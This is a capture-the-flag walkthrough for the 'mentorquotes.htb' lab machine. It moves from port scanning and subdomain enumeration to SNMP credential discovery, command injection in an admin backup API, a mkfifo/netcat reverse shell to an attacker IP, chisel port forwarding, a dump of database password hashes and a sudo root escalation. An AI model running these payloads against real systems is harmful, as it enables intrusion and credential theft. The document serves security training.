TCP Scan

> TARGET= && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
  • Found domain: mentorquotes.htb

Wen Enum

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://mentorquotes.htb/" -H "Host: FUZZ.mentorquotes.htb" --hl 9

000000051:   404        0 L      2 W        22 Ch       "api"

> dirsearch -u http://api.mentorquotes.htb/
[19:48:13] 307 -    0B  - /admin  ->  http://api.mentorquotes.htb/admin/
[19:48:15] 422 -  186B  - /admin/
[19:48:15] 422 -  186B  - /admin/?/login
[19:48:16] 307 -    0B  - /admin/backup/  ->  http://api.mentorquotes.htb/admin/backup
[19:48:38] 405 -   31B  - /auth/login
[19:48:56] 200 -  969B  - /docs
[19:48:56] 307 -    0B  - /docs/  ->  http://api.mentorquotes.htb/docs
[19:49:46] 403 -  285B  - /server-status/
[19:49:46] 403 -  285B  - /server-status
[19:50:03] 307 -    0B  - /users  ->  http://api.mentorquotes.htb/users/
[19:50:03] 307 -    0B  - /users/admin.php  ->  http://api.mentorquotes.htb/users/admin.php/
[19:50:03] 422 -  186B  - /users/
[19:50:03] 307 -    0B  - /users/admin  ->  http://api.mentorquotes.htb/users/admin/
[19:50:03] 307 -    0B  - /users/login  ->  http://api.mentorquotes.htb/users/login/
[19:50:03] 307 -    0B  - /users/login.php  ->  http://api.mentorquotes.htb/users/login.php/
[19:50:03] 307 -    0B  - /users/login.aspx  ->  http://api.mentorquotes.htb/users/login.aspx/
[19:50:03] 307 -    0B  - /users/login.html  ->  http://api.mentorquotes.htb/users/login.html/
[19:50:03] 307 -    0B  - /users/login.jsp  ->  http://api.mentorquotes.htb/users/login.jsp/
[19:50:03] 307 -    0B  - /users/login.js  ->  http://api.mentorquotes.htb/users/login.js/
  • Browsing to http://api.mentorquotes.htb/docs, found james’s email


Intended: snmpwalk

  • There is a snmp service running on the target, hence perform a snmpwalk and found a credential
> snmpwalk -v2c -c internal mentorquotes.htb

iso. = STRING: "/usr/local/bin/ k******************3"
  • This is the credential for the user james

Unintedned way: (Patched)

  • Tampering with the method: http://api.mentorquotes.htb/docs#/Auth/create_user_auth_signup_post with the following payload. We can register a user called james and provide our own email.
  "email": "",
  "username": "james",
  "password": "test1234"

Login as james

  • Now, we are able to login using http://api.mentorquotes.htb/docs#/Auth/login_auth_login_post with the same payload and receive a token
# payload
  "email": "james@mentorquotes.htb",
  "username": "james",
  "password": "<password>"

  • And, we can query the /admin section with the token just created
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/
{"admin_funcs":{"check db connection":"/check","backup the application":"/backup"}}
  • Checking the two paths under /admin received the following responses:
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/check
{"details":"Not implemented yet!"}

> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup
{"detail":"Method Not Allowed"}
# for a post request, this is the response
{"detail":[{"loc":["body"],"msg":"field required","type":"value_error.missing"}]}

# to make a backup, the expected payload format is
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d "{\"body\":\"test\",\"path\":\"test\"}"
  • Further enum found that the path parameter is vulnerable to cmd injection
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `wget http://<ip>`"}'
  • This can be used to get a reverse shell
> curl -H "authorization: <token>" http://api.mentorquotes.htb/admin/backup -H "content-type: application/json" -d '{"body":"test","path":"test `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker-ip> 4444 >/tmp/f`"}'
  • Fetch the user flag
/home/svc # cat user.txt

SSH access as svc

  • Locate /app_backkup.tar and examine the script /app/app/ found a connection string to db
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@")
  • Port forward the target port using chisel
# on kali
> chisel server -p 9999 --reverse

# on target
> chisel client --max-retry-count=1 <attacker-ip>:9999 R:55432:
  • Login to the postgres db via the forwarded port and dump all user info
> psql -h -p 55432 -Upostgres -W -d mentorquotes_db

mentorquotes_db=# \dt
          List of relations
 Schema |   Name   | Type  |  Owner   
 public | cmd_exec | table | postgres
 public | quotes   | table | postgres
 public | users    | table | postgres
(3 rows)

mentorquotes_db=# select * from users;
 id |         email          |  username   |             password             
  1 | james@mentorquotes.htb | james       | 7ccdcd8c05b59add9c198d492b36****
  2 | svc@mentorquotes.htb   | service_acc | 53f22d0dfa10dce7e29cd31f4f95****
  4 |         | james       | 16d7a4fca7442dda3ad93c9a726597e4
  • 53f22d0dfa10dce7e29cd31f4f95**** can be cracked on
  • This can be used to login to the target via ssh as svc


  • Examine /etc/snmp/snmpd.conf for james’ password
createUser bootstrap MD5 ******************* DES
  • Prompt to root
svc@mentor:~$ su - james
james@mentor:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on mentor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User james may run the following commands on mentor:
    (ALL) /bin/sh
james@mentor:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)